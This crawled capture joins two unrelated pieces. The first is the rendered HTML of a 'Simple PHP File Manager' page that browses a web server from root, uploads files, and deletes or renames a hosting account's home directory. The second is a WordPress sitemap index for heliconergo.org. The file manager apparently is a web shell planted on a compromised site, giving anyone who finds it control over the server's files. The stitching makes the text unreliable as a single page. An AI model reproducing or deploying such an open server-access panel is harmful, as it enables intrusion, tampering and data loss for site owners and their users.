
<!DOCTYPE html>
<html>
<head>
    <title>Simple PHP File Manager</title>
</head>
<body>
    <h1>File Manager</h1>
    <p>Current Path: <a href="?dir=/">Root</a> / <a href="?dir=%2Fhome%2F">home</a></p>

    <!-- Form Upload -->
    <h2>Upload File</h2>
    <form method="post" enctype="multipart/form-data">
        <input type="file" name="file">
        <input type="submit" name="upload" value="Upload">
    </form>

    <!-- List Files and Folders -->
    <h2>Files and Folders</h2>
    <table border="1">
        <tr><th>Name</th><th>Actions</th></tr>
        <tr><td><a href="?dir=%2Fhome%2Fu745946939">u745946939/</a></td><td><a href="?dir=%2Fhome%2F&delete=u745946939" onclick="return confirm('Delete?')">Delete</a> | <form method="post" style="display:inline;">
                        <input type="hidden" name="rename_old" value="u745946939">
                        <input type="text" name="rename_new" placeholder="New name">
                        <input type="submit" value="Rename">
                      </form></td></tr>    </table>

    <!-- Navigasi ke parent jika bukan root -->
            <p><a href="?dir=%2F">Go to Parent Directory</a></p>
    </body>
</html>
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://heliconergo.org/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://heliconergo.org/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-taxonomies-product_brand-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-taxonomies-product_tag-1.xml</loc></sitemap><sitemap><loc>https://heliconergo.org/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
